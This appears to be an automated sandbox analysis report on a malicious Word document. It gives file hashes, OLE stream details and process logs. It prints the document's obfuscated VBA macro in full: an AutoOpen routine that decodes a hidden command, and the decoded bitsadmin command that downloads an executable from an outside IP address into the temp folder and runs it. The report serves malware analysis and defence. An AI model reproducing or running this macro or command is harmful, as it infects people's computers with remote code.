C:\~$374756930bee59c371d98ff88572a8.doc	Type: data MD5: 2BF903A3DD633A8DE32B80AE8D37DBB6 SHA: B1193C3CE115C9866BEB9D675BAAB4BF121EF9E3 SHA-256: FED25559A8C18DDA9BEDFFE7A132C364EC2CC138CF3292920F0C65C844ED6B6C SHA-512: A2C7B1FF5A2F30C4E8BF6EF532E84B90474E6FB3DA8FC34570ECA450F96805843B8DEEC819D17DE54D2CEB4E79B5E5D6740FDE8355B11A53D71F81BC622438DC

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type:	0
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	2e374756930bee59c371d98ff88572a8.doc
File size:	119808
MD5:	2e374756930bee59c371d98ff88572a8
SHA1:	c5f3fd7570bd32edc44795a92c59965b4d9bbc08
SHA256:	115c18d207694542dad0e876a36f1a64447a45fa2f78a0254f75799122810922
SHA512:	7a2eb7d8d8fc9be26fcf3f4e95ffc794f371e1f7984c64536469f51c4d1f27c1a9734254cfd0942fcf86209a03152a4b2d05802a17be5b23cfcf4a239d099fa9
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "2e374756930bee59c371d98ff88572a8.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1251
Title:
Subject:
Author:	admin
Keywords:
Comments:
Template:	Normal.dot
Last Saved By:	dood
Revion Number:	31
Total Edit Time:	4860
Create Time:	2016-08-03 20:27:00
Last Saved Time:	2016-09-21 11:55:00
Number of Pages:	1
Number of Words:	102
Number of Characters:	586
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1251
Number of Lines:	4
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:	NhT
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	730895

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 8792

General
Stream Path:	Macros/VBA/NewMacros
VBA File Name:	NewMacros.bas
Stream Size:	8792
Data ASCII:	. . . . . . . . . d . . . . . . . . . . . . . . . k . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 64 08 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6b 08 00 00 13 19 00 00 00 00 00 00 01 00 00 00 96 d5 ea 28 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "NewMacros"

Function MJCTM(CWDMxZLy As String, FbIlx As String)

    Const MiPNInTB = "usher"

    Const VoTwTzi = 56413.774156729

    ijrJGJ = 27499.72631798

    Dim SMBLRBfVb

    SMBLRBfVb = Empty

    Dim UaeOs

    UaeOs = Array()

    Dim u6TmeUD

    u6TmeUD = 104

    ur6AH = Null

    cxnTF = "l"

    MJCTM = Replace(CWDMxZLy, FbIlx, "")

    Dim pLTyDvz

    pLTyDvz = Empty

    pcIlatmCk = Array(230, -196, -2001184018, 42, True)

    BnrkBExe = Array(10023, True, 53568, 247)

    Dim WDYsMRc

    WDYsMRc = 30721.11938915

    Dim YzdUxwdTr As Integer

    YzdUxwdTr = 6299

    Dim lByiA

    lByiA = Array()

    Const zLddbe = "m"

    Dim rIBoSu3Y

    rIBoSu3Y = Null

    Set SHswlL = CreateObject("vbscript.regexp")

    QSdqj = Date

    Const NFLd2 = 209

    Dim twrPREK As Variant

    twrPREK = Array()

    Dim u5gdI As Variant

    u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)

    Const AiUVN = 130

    Dim xrO5u As Boolean

    xrO5u = False

    Dim DtSd2 As Currency

    DtSd2 = 24643

    TxB7XFd = Array()

    SHswlL.Pattern = FbIlx

    Dim KWqu4PuM

    KWqu4PuM = Array(18941)

    Const PoTWMJbw = 4611

    Const zvcqMHRt = 45690

    Dim dBM7m

    dBM7m = Array()

    Dim Jhkf0ces

    Jhkf0ces = 18334

    Px3LN = Empty

    Dim CP3XeR As Long

    Dim QLnSIFu

    QLnSIFu = "g"

    Dim FjRfK

    FjRfK = 37054

    Dim lttYOFV As Byte

    lttYOFV = 103

    Dim hwbE4nQC

    hwbE4nQC = 238

    Dim HxZaHEuKH

    HxZaHEuKH = ""

    ZIGd3quHC = Date

    efuU1j3i = 19822

    CP3XeR = True

    IsvteRd = True

    Dim xrm3j

    xrm3j = 0

    Const wwBlWqvE = 32055

    Dim YrDaO As Integer

    YrDaO = -20549

    Dim TQAPu

    TQAPu = Empty

    XFRbqp6x = False

    QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)

    Const ZLaDNPOM0 = 0

    SHswlL.Global = CP3XeR

    Dim BShA9 As Long

    BShA9 = -652703950

    Dim VLlsY

    VLlsY = 173

    Dim JrF8V

    JrF8V = Null

    Const YCxJyqzq = -23691

    PlVOxYFG = "-31815"

    Const QjPYL = 224

    MJCTM = SHswlL.Replace(CWDMxZLy, "")

End Function



Sub AutoOpen()

    Dim GUEQgl0 As Currency

    GUEQgl0 = -4067

    Dim wcUbOm

    wcUbOm = Array()

    Dim gq5z4s

    gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)

    oUJ1RH = 12730.522629119

    Dim SYLDEIEHU As Long

    SYLDEIEHU = -1851000800

    Dim FtubqlSwF

    FtubqlSwF = 194

    Const nfYJAbOe = True

    dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)

    Dim nUKaI61f As String

    Const EbPbjMfg = False

    Dim ETBwFjm

    ETBwFjm = Array()

    qHfrpSwZq = -219635906

    Dim uj0Cswp

    uj0Cswp = 9

    Dim kyyXvysya As Variant

    kyyXvysya = Array()

    nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")

    AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)

    Dim jQsbW

    jQsbW = Date

    Dim J8pAjy As String

    J8pAjy = "317eed7b"

    zHgWO = -2086329278

    kpmVq = Empty

    BqXpmPanR = True

    hRpGYfaRr = -426398108

    Const IbHFT = "32500"

    G3h5PwT = -13855

    Shell nUKaI61f, 0

    Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")

    ORSXIMyL = -16892

    Dim SGqXR

    SGqXR = 16032.845284238

    Const OFXiY = 34986.350534212

    Dim xQWF3VrvY As Variant

    xQWF3VrvY = Array()

VBA Code

Attribute VB_Name = "NewMacros"
Function MJCTM(CWDMxZLy As String, FbIlx As String)
Const MiPNInTB = "usher"
Const VoTwTzi = 56413.774156729
ijrJGJ = 27499.72631798
Dim SMBLRBfVb
SMBLRBfVb = Empty
Dim UaeOs
UaeOs = Array()
Dim u6TmeUD
u6TmeUD = 104
ur6AH = Null
cxnTF = "l"
MJCTM = Replace(CWDMxZLy, FbIlx, "")
Dim pLTyDvz
pLTyDvz = Empty
pcIlatmCk = Array(230, -196, -2001184018, 42, True)
BnrkBExe = Array(10023, True, 53568, 247)
Dim WDYsMRc
WDYsMRc = 30721.11938915
Dim YzdUxwdTr As Integer
YzdUxwdTr = 6299
Dim lByiA
lByiA = Array()
Const zLddbe = "m"
Dim rIBoSu3Y
rIBoSu3Y = Null
Set SHswlL = CreateObject("vbscript.regexp")
QSdqj = Date
Const NFLd2 = 209
Dim twrPREK As Variant
twrPREK = Array()
Dim u5gdI As Variant
u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)
Const AiUVN = 130
Dim xrO5u As Boolean
xrO5u = False
Dim DtSd2 As Currency
DtSd2 = 24643
TxB7XFd = Array()
SHswlL.Pattern = FbIlx
Dim KWqu4PuM
KWqu4PuM = Array(18941)
Const PoTWMJbw = 4611
Const zvcqMHRt = 45690
Dim dBM7m
dBM7m = Array()
Dim Jhkf0ces
Jhkf0ces = 18334
Px3LN = Empty
Dim CP3XeR As Long
Dim QLnSIFu
QLnSIFu = "g"
Dim FjRfK
FjRfK = 37054
Dim lttYOFV As Byte
lttYOFV = 103
Dim hwbE4nQC
hwbE4nQC = 238
Dim HxZaHEuKH
HxZaHEuKH = ""
ZIGd3quHC = Date
efuU1j3i = 19822
CP3XeR = True
IsvteRd = True
Dim xrm3j
xrm3j = 0
Const wwBlWqvE = 32055
Dim YrDaO As Integer
YrDaO = -20549
Dim TQAPu
TQAPu = Empty
XFRbqp6x = False
QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)
Const ZLaDNPOM0 = 0
SHswlL.Global = CP3XeR
Dim BShA9 As Long
BShA9 = -652703950
Dim VLlsY
VLlsY = 173
Dim JrF8V
JrF8V = Null
Const YCxJyqzq = -23691
PlVOxYFG = "-31815"
Const QjPYL = 224
MJCTM = SHswlL.Replace(CWDMxZLy, "")
End Function

Sub AutoOpen()
Dim GUEQgl0 As Currency
GUEQgl0 = -4067
Dim wcUbOm
wcUbOm = Array()
Dim gq5z4s
gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)
oUJ1RH = 12730.522629119
Dim SYLDEIEHU As Long
SYLDEIEHU = -1851000800
Dim FtubqlSwF
FtubqlSwF = 194
Const nfYJAbOe = True
dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)
Dim nUKaI61f As String
Const EbPbjMfg = False
Dim ETBwFjm
ETBwFjm = Array()
qHfrpSwZq = -219635906
Dim uj0Cswp
uj0Cswp = 9
Dim kyyXvysya As Variant
kyyXvysya = Array()
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)
Dim jQsbW
jQsbW = Date
Dim J8pAjy As String
J8pAjy = "317eed7b"
zHgWO = -2086329278
kpmVq = Empty
BqXpmPanR = True
hRpGYfaRr = -426398108
Const IbHFT = "32500"
G3h5PwT = -13855
Shell nUKaI61f, 0
Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")
ORSXIMyL = -16892
Dim SGqXR
SGqXR = 16032.845284238
Const OFXiY = 34986.350534212
Dim xQWF3VrvY As Variant
xQWF3VrvY = Array()
dVrztZa = 0
JBwM8 = 14580.854766339
End Sub

VBA File Name: ThisDocument.cls, Stream Size: 924

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	924
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 9e 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff a5 02 00 00 f9 02 00 00 00 00 00 00 01 00 00 00 96 d5 a8 c2 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 113

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	113
Entropy:	4.34494072836
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . M i c r o s o f t O f f i c e W o r d . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size:	4096
Entropy:	0.508296801708
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N h T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 01 00 00 ec 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size:	4096
Entropy:	0.464316040624
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248282368, Stream Size: 7198

General
Stream Path:	1Table
File Type:	FoxPro FPT, blocks size 256, next free block index 2248282368
Stream Size:	7198
Entropy:	3.07205149777
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	86 02 11 00 12 00 01 00 9c 00 0f 00 04 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Data, File Type: data, Stream Size: 74220

General
Stream Path:	Data
File Type:	data
Stream Size:	74220
Entropy:	7.9301420367
Base64 Encoded:	True
Data ASCII:	. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . C . . . : . . . . A . . . . . . " . . . . . . . . . . . . . . . m . i . c . r . o . s . o . f . t . _ . o . f . f . i . c . e . . . . . . . . . . . . . . . b . . . m . . . . . R . o x = . . . j B 4 . . . s . . . I . . . . . . . D . . . . . D . . n . . A . . . R . o x = . . . j B 4 . . . s . . . P N G . . . . . . . . I H D R .
Data Raw:	1f 13 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 0c 1a 04 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 3a 00 00 00 04 41 01 00 00 00 05 c1 22 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 6d 00 69 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 485

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	485
Entropy:	5.23409240996
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " s d g s d g s d g e r g h e g e " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 0 9 2 3 C 3 A 4 0 3 A 4 0 3 E 4 4 3 E 4 4 " . . D P B = " 2 0 2 2 8 C D 3 A 9 D 3 A 9 2 C 5 7 D 4 A 9 1 6 8 F C 1 0 5 0 4 5 A
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 73 64 67 73 64 67 73 64 67 65 72 67

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	71
Entropy:	3.34859995248
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4210

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4210
Entropy:	4.90815306169
Base64 Encoded:	False
Data ASCII:	. a y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 79 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 588

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	588
Entropy:	6.2869378548
Base64 Encoded:	True
Data ASCII:	. H . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . s d g . . e r g h . e g e . . L . . @ . . . . . . = . . . . ~ . . . . . . . . . . . . Y ( . . . . J < . . . . . . 9 s t d o l e > . . . s . t . d . o . . l . e . . . h . . % ^ . . * \\ G { 0 . 0 0 2 0 4 3 0 - ; . . . . C . . . . . . 0 0 . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t 8 i o n . 0 . . . E N o P r m a l . E N . C r . . m . a . F . . . . . . . . * \\ C . . . .
Data Raw:	01 48 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 10 00 1c 08 73 64 67 03 08 65 72 67 68 10 65 67 65 05 00 4c 00 00 40 d5 02 0a 06 02 0a 3d 02 0a 07 02 7e 01 14 0a 08 06 12 09 02 12 c5 17 ac 59 28 10 00 0c 02 4a 3c 02 0a 16 00 01 01 39 73 74 64 6f 6c 65 3e 01 02 19 73 00 74 00 64 00 6f 00 00 6c 00 65 00 0d 00 68 05 00 25 5e 00 03 2a

Stream Path: WordDocument, File Type: data, Stream Size: 8248

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	8248
Entropy:	3.72353646171
Base64 Encoded:	True
Data ASCII:	. . . . # ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j m . m . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . ^ . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 .
Data Raw:	ec a5 c1 00 23 60 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 06 00 00 b0 0b 00 00 0e 00 62 6a 62 6a 6d a5 6d a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 38 20 00 00 0f cf 00 00 0f cf 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3696 Parent PID: 2740

General

Start time:	17:34:20
Start date:	12/01/2017
Path:	C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0xcb0000
File size:	1923232 bytes
MD5 hash:	FEC5FFC0B51C78D9376A74CD2855D479
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1964 Parent PID: 3696

General

Start time:	17:34:25
Start date:	12/01/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Imagebase:	0x771a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: bitsadmin.exe PID: 1800 Parent PID: 1964

General

Start time:	17:34:26
Start date:	12/01/2017
Path:	C:\Windows\System32\bitsadmin.exe
Wow64 process (32bit):	false
Commandline:	bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe
Imagebase:	0x755a0000
File size:	186368 bytes
MD5 hash:	0920B14AA67A8B04ACF48FFE7C6F0927
